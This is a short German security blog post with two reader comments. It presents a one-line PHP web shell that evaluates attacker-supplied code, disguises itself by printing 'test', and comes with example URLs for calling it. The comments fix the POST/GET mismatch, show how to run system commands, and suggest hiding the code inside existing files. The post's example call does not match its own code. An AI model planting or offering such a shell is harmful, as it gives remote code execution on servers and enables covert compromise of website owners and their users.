BotNetzProvider.de Ein Security Blog über Honig-Töpfe (honeypots) , Bots und Bitcoin

1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading...
9Feb/102

Micro PHP Shell – Stand-Alone

Hier möchte ich kurz mal eine neue PHP-Shell euch vorstellen. Es handelt sich dabei um eine "Stand-Alone" PHP Shell, die sich auch noch in gewisser maßen "tarnt".

test<?php @eval($_POST[code]);?>

Bei einem direkten Aufruf bekommt man ein "test" zurück. Man könnte hier auch einfachen eigenen HTML Code mitgeben. Die Shell wird ganz normal aufgerufen mit folgendem Befehl:
http://www.deine-webseite-und-nur-deine.de/shell.php?code=[foo]

Wir immer aus der Reihe der Micro PHP Shells möchte ich euch darauf hinweisen, dass ihr die Shells nur zu edukativen Zwecken verwenden werden dürfen.

veröffentlicht unter: PHP-Shell Kommentar schreiben
Kommentare (2) Trackbacks (0)
  1. Dein Script ist so leider nicht richtig entweder du änderst das $_POST in $_GET um oder es wird so wie von dir erklärt nicht funktionieren. Btw ist es schwachsinn dort noch test auszugeben man kann den Code einfach in bestehende Files reinpacken.

    Ciao

  2. Schliesse mich da Gunner an.

    /* shell.php */

    Mit diesen kleinen Code kann man dann Fremmdcode auf dem Server ausführen.
    Bsp:
    http://localhost/shell.php?code=system(„ver“);


Leave a comment

Noch keine Trackbacks.

/* google like button API */